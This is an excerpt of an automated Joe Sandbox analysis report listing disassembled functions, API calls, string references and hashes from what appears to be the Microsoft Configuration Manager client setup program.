                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::ApplyDeltaPatchChanges$DetermineApplicablePatches(sCachedMsi, m_sWorkingProductCode)$GetCachedMsiPath(sPath)$GetPackageInfo(sCachedMsi, m_sWorkingProductCode)$PrepareMsiProperties(InstallAction_Repair, sMsiProperties, sTemp, mapTemp)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi
                                                                                          • API String ID: 3423034556-3003704085
                                                                                          • Opcode ID: f042f1110680cf67b553b5db8db33f9758777e1a148d9974a8ed1ae06f7a30ae
                                                                                          • Instruction ID: 44cb3c0b6a17d48b5ec948797a7d78c3b3a0cc1408a19c410ffd7ed98fe76a9a
                                                                                          • Opcode Fuzzy Hash: f042f1110680cf67b553b5db8db33f9758777e1a148d9974a8ed1ae06f7a30ae
                                                                                          • Instruction Fuzzy Hash: 4571FE71D00258EEDB11EBA4CC4AFEE7F79BB92700F048099F009A7282CB745E05DB62
                                                                                          Function 00619216 Relevance: 40.4, APIs: 5, Strings: 18, Instructions: 180threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061921D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00619291
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006192F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061934D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061939B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$..\CommandLine.cpp$CCM::Utility::CommandLine::SetCommandLine$ProcessCommandLine(sCmd)$Set command line: %s$pszCommandLine != 0$pszCommandLine[0] != 0$sCmd.empty() == false
                                                                                          • API String ID: 3353525418-1576885467
                                                                                          • Opcode ID: 9e6a6c1bb91da4e9475b72dbfcb106d1fa738984c4320cccb7bf24fd5462a6e8
                                                                                          • Instruction ID: f9ed5fdcbbf45140a9f11f1530de917c9dbbb95e2bddc7808e1c4b58c38c7df3
                                                                                          • Opcode Fuzzy Hash: 9e6a6c1bb91da4e9475b72dbfcb106d1fa738984c4320cccb7bf24fd5462a6e8
                                                                                          • Instruction Fuzzy Hash: 5161E571D40249EEDF10EFA4CD5AEEDBBB9AF50700F188019F501B7282C7785A4ACBA1
                                                                                          Function 0065614D Relevance: 40.4, APIs: 4, Strings: 19, Instructions: 148threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00656154
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006561B6
                                                                                            • Part of subcall function 00611906: __EH_prolog3_catch.LIBCMT ref: 0061190D
                                                                                            • Part of subcall function 00611906: GetCurrentThreadId.KERNEL32 ref: 0061197C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00656219
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00656289
                                                                                          Strings
                                                                                          • CCMGetCertificateContextWrapperEx - function called while in provisioning mode., xrefs: 00656240
                                                                                          • false == bProvMode, xrefs: 0065620F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00656214
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656291
                                                                                          • CCM::Authentication::CCMGetCertificateContextWrapperEx, xrefs: 00656170
                                                                                          • CcmUtilLib::CcmGetCertificateContextEx1(ppCertContext, bOuterCert), xrefs: 0065627F
                                                                                          • HRESULT, xrefs: 006562CF
                                                                                          • CCM_ServiceHost_CertRetrieval_Status, xrefs: 006562D4
                                                                                          • HRESULT, xrefs: 006562F2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00656284
                                                                                          • 0 != ppCertContext, xrefs: 006561AC
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656279
                                                                                          • ..\ccmgencert.cpp, xrefs: 006561A6
                                                                                          • CCM_ServiceHost_CertRetrieval_Status, xrefs: 006562F7
                                                                                          • ..\ccmgencert.cpp, xrefs: 006561BE
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656221
                                                                                          • 0x%08x, xrefs: 006562A0
                                                                                          • ..\ccmgencert.cpp, xrefs: 00656209
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006561B1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$0 != ppCertContext$0x%08x$CCM::Authentication::CCMGetCertificateContextWrapperEx$CCMGetCertificateContextWrapperEx - function called while in provisioning mode.$CCM_ServiceHost_CertRetrieval_Status$CCM_ServiceHost_CertRetrieval_Status$CcmUtilLib::CcmGetCertificateContextEx1(ppCertContext, bOuterCert)$HRESULT$HRESULT$false == bProvMode
                                                                                          • API String ID: 2064133979-2846516280
                                                                                          • Opcode ID: 48ca06e4110c184fcb0b12c2aeaf9da60691ee2fc38d01f63a24e644a0c19fbb
                                                                                          • Instruction ID: 57de59569328e48b193fa347ab6e2b9e76421bde5b0ee1d8946de6b03696a85d
                                                                                          • Opcode Fuzzy Hash: 48ca06e4110c184fcb0b12c2aeaf9da60691ee2fc38d01f63a24e644a0c19fbb
                                                                                          • Instruction Fuzzy Hash: 0A4114B1D40349BADB20EBA4CC4AEEE7E79FF55714F548008F918B7382D2788A49C761
                                                                                          Function 0060421C Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 148threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00604223
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00604279
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006042D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00604317
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006043CE
                                                                                            • Part of subcall function 0066DD95: __make__time64_t.LIBCMT ref: 0066DD9D
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0060440D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3_catch_Throw__make__time64_t
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$..\Time.cpp$CCM::Utility::Time::Time$m_time != -1$nDay >= 1 && nDay <= 31$nMonth >= 1 && nMonth <= 12$nYear >= 1900
                                                                                          • API String ID: 2383739516-199539263
                                                                                          • Opcode ID: cabcbaa5f2f2b41d3d7340e826a5ad9120c8136da1bd6d78d95cacf74ed17314
                                                                                          • Instruction ID: e72c30c803ec747855298806ccc96137a3d3815b77266421dd173ea3ae6ccd9d
                                                                                          • Opcode Fuzzy Hash: cabcbaa5f2f2b41d3d7340e826a5ad9120c8136da1bd6d78d95cacf74ed17314
                                                                                          • Instruction Fuzzy Hash: 5951F5B1A80309ABCB24DF94C849BEEBBA5EF54714F14811AF654B73C1CF796901CB52
                                                                                          Function 0061013A Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 105threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00610141
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00610197
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006101FD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061023D
                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000008,00000000), ref: 00610258
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00610291
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ArrayElementH_prolog3_catchSafe
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$CCM::Utility::SafeArray::getBstr$SafeArrayGetElement(m_psaArray, &lIndex, pbstrVal)$getType() == VT_BSTR$m_psaArray != 0$pbstrVal != 0
                                                                                          • API String ID: 997265480-2282198304
                                                                                          • Opcode ID: 9d6afbb66a292c1bf3bb454c0b94c3f6512f18c7f7a074193a1f6ba7083a9cc6
                                                                                          • Instruction ID: 7dae1dd45b72ea45a51dad730d3e8b0d4f34103f90437e32dab74177401cc1f6
                                                                                          • Opcode Fuzzy Hash: 9d6afbb66a292c1bf3bb454c0b94c3f6512f18c7f7a074193a1f6ba7083a9cc6
                                                                                          • Instruction Fuzzy Hash: 8031A571680355BAEF20AF918D0AFEE3E66AB51B10F588006FD41773C2C6BD4AC587A1
                                                                                          Function 006102EF Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 105threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006102F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061034C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006103B2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006103F2
                                                                                          • SafeArrayGetElement.OLEAUT32(?,00000008,00000000), ref: 0061040D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00610446
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ArrayElementH_prolog3_catchSafe
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$..\SafeArray.cpp$CCM::Utility::SafeArray::getUnknown$SafeArrayGetElement(m_psaArray, &lIndex, ppUnk)$getType() == VT_UNKNOWN$m_psaArray != 0$ppUnk != 0
                                                                                          • API String ID: 997265480-3444498637
                                                                                          • Opcode ID: aa8d10f7c388925fb84dc5cffc2df8a85bb0fcc9ce465773467bc5f1f6e4856e
                                                                                          • Instruction ID: 74c3583a455a3b900e7739305c03a2f0a7606d8eb097b2cfba8fce5364c14810
                                                                                          • Opcode Fuzzy Hash: aa8d10f7c388925fb84dc5cffc2df8a85bb0fcc9ce465773467bc5f1f6e4856e
                                                                                          • Instruction Fuzzy Hash: 8531E3B1680346FBEF21AF908D0AFEE7A65AB50F10F588009BD55B72C1C6F94A818661
                                                                                          Function 005AF060 Relevance: 38.9, APIs: 3, Strings: 19, Instructions: 416threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AF06A
                                                                                            • Part of subcall function 005AB6BC: __EH_prolog3.LIBCMT ref: 005AB6C3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AF186
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AF3BC
                                                                                          Strings
                                                                                          • msiutil.cpp, xrefs: 005AF3C4
                                                                                          • Running installation package Package: %s Log: %s Properties: %s, xrefs: 005AF20A
                                                                                          • File %s installation succeeded. Windows Installer has requested a reboot., xrefs: 005AF4A2
                                                                                          • .MSP, xrefs: 005AF299
                                                                                          • File %s installation succeeded., xrefs: 005AF5EA
                                                                                          • msiutil.cpp, xrefs: 005AF176
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AF3B7
                                                                                          • uError, xrefs: 005AF3B2
                                                                                          • MsiEnableLogW( dwMsiLogOptions, sLogFile, 0 ), xrefs: 005AF17C
                                                                                          • InstallPackage, xrefs: 005AF0AE
                                                                                          • msiutil.cpp, xrefs: 005AF18E
                                                                                          • msiutil.cpp, xrefs: 005AF3AC
                                                                                          • ., xrefs: 005AF22B
                                                                                          • File %s installation failed. Error text: %s, xrefs: 005AF402
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AF181
                                                                                          • File %s installation failed because another program is installing (1618), xrefs: 005AF537
                                                                                          • ExitCode: %luAction: %sErrorMessages:%s, xrefs: 005AF355
                                                                                          • File %s installation succeeded. Windows Installer has initiated a reboot., xrefs: 005AF4F7
                                                                                          • File %s installation was cancelled (1602), xrefs: 005AF59E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.$.MSP$ExitCode: %luAction: %sErrorMessages:%s$File %s installation failed because another program is installing (1618)$File %s installation failed. Error text: %s$File %s installation succeeded.$File %s installation succeeded. Windows Installer has initiated a reboot.$File %s installation succeeded. Windows Installer has requested a reboot.$File %s installation was cancelled (1602)$InstallPackage$MsiEnableLogW( dwMsiLogOptions, sLogFile, 0 )$Running installation package Package: %s Log: %s Properties: %s$msiutil.cpp$msiutil.cpp$msiutil.cpp$msiutil.cpp$uError
                                                                                          • API String ID: 3353525418-2638979762
                                                                                          • Opcode ID: df127409bc08f09a542d966b7a05f7923e97090ed2e7044d36918e9f1f61c777
                                                                                          • Instruction ID: b1e68e14b8bce0bd143cac143028ff21d2c4b910ce0c4d771404f40db4e17d9e
                                                                                          • Opcode Fuzzy Hash: df127409bc08f09a542d966b7a05f7923e97090ed2e7044d36918e9f1f61c777
                                                                                          • Instruction Fuzzy Hash: 21F1AF70900249EADF24DFA8CD89BEEBFB9BF56304F1040A9E54967282D7745E48CF61
                                                                                          Function 00654062 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 185threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065406C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006540EA
                                                                                            • Part of subcall function 0065431B: __EH_prolog3_catch_GS.LIBCMT ref: 00654325
                                                                                            • Part of subcall function 0065431B: WSAStartup.WS2_32(00000202,?), ref: 00654384
                                                                                            • Part of subcall function 0065431B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000001D,00000000,00000000), ref: 006543B7
                                                                                            • Part of subcall function 0065431B: inet_addr.WS2_32(?), ref: 006543DF
                                                                                            • Part of subcall function 0065431B: GetNameInfoW.WS2_32(?,00000010,?,00000401,00000000,00000000,00000004), ref: 00654406
                                                                                            • Part of subcall function 0065431B: WSAGetLastError.WS2_32 ref: 00654410
                                                                                            • Part of subcall function 0065431B: GetCurrentThreadId.KERNEL32 ref: 00654449
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00654164
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006541BC
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000000F,00000000,00000000,?,000000FE,000000FE,00000000,?,008742F8,CCM::LocationServices::LSInternalWinsResolveSMSName,00000154), ref: 006541E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ByteCharH_prolog3_catch_MultiWide$ErrorInfoLastNameStartupinet_addr
                                                                                          • String ID: $ $%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$..\lswins.cpp$Attempting to find '%s' with %d suffix on LANA %d from WINS$Attempting to resolve '%s' with %d suffix from WINS$CCM::LocationServices::LSInternalWinsResolveSMSName$iRet == 0x00$iRet == 0x00$szName
                                                                                          • API String ID: 1632605935-1537771779
                                                                                          • Opcode ID: d8b06fed09a23fa279d47bdb9d9fe02296fd6bbbd415605e5e5a7621a900e925
                                                                                          • Instruction ID: 5092d4d74422c38324f7bc2789127145987bc902fe13e37e93948087130e97a9
                                                                                          • Opcode Fuzzy Hash: d8b06fed09a23fa279d47bdb9d9fe02296fd6bbbd415605e5e5a7621a900e925
                                                                                          • Instruction Fuzzy Hash: B6611571944359AADF209FA48C49BFE7B79AB55309F0450D5FD4CA7382CB788E88CB60
                                                                                          Function 0060813F Relevance: 38.6, APIs: 5, Strings: 17, Instructions: 131threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00608146
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006081AD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608211
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608257
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006082A3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::GetDirectory$p.assign(pszFileName)$p.remove()$pszFileName != 0$pszFileName[0] != L'\0'
                                                                                          • API String ID: 3353525418-3582719604
                                                                                          • Opcode ID: d9299996fe72c2585bf5f2e621b8e8ec987a1ccb4eb4aaa9f86f4b6fbd413018
                                                                                          • Instruction ID: 3814b52b377e3dd987bf0613be7776fe875b252bce9754a20774d5e1dce9f78c
                                                                                          • Opcode Fuzzy Hash: d9299996fe72c2585bf5f2e621b8e8ec987a1ccb4eb4aaa9f86f4b6fbd413018
                                                                                          • Instruction Fuzzy Hash: 6641F4B0A80355BECB15EBA4DC4AEEFBE65AF14B50F048055F894772D2DBB84B06C750
                                                                                          Function 005BC019 Relevance: 36.9, APIs: 4, Strings: 17, Instructions: 148threadCOMMON
